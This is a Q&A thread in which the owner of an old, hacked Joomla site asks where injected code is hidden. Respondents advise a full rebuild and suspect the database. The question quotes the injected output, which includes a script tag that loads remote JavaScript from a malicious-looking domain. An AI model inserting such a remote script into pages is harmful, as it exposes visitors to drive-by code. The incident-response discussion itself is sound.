# Joomla site hacked

Tags: security, joomla

I have a old one joomla 10.0.15 that was hacked a week ago, I don't have a backup because we are planning to migrate, but I need to know what happen. After fix permissions, reinstall all core files, still have two problems, the first one is still have malicious code:

```
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
<script type="text/javascript">
_uacct ="UA-xxxxxxx-x";
urchinTracker();
</script>
<script src="http://equate22motorde.rr.nu/nl.php?p=d"></script>
</body>
```

The url change with every reload. I can't find where the code is. I checked the template, and other files, but nothing. ¿any ideas about where can I check?

The another issue is with the file and folder access, even when the permissions are OK, this joomla installation is unable to write in folders or modify any file.

Thanks in advance.

Comment: Try asking on a Joomla forum.

Comment: don't try fixing the original website. As Devin mentions below you cannot be sure what has changed so you will never know if you have fixed everything. If you don't have a backup the only safe solution is to rebuild the website in a new Joomla installation and copy over your media but don't copy your code. That's a very very very old version of Joomla (3+ years). The best place to ask for advice is in the J1.0 security forum here: http://bit.ly/HbDJUs

Comment: Try to install some good security extensions for your joomla site, regularly check the access logs, block permissions to the important files, only install extensions from trusted sources, regularly upgrade your core joomla source files.... these are the minimum steps to secure your joomla site.

Answer (score 2):

You need to redeploy the code you have from a known good backup, who knows what was changed or compromised. If you are also responsible for the server then you need to patch the security hole and check the system for any signs of tampering, although the best bet for you is to reimage the server and start from scratch.

Answer (score 0):

They probably put the malicious code in the database.

But you should treat the server as compromised: Format the drive, reinstall the operating system, and rebuild your Joomla environment. Treat any data you take off that server as dangerous, too.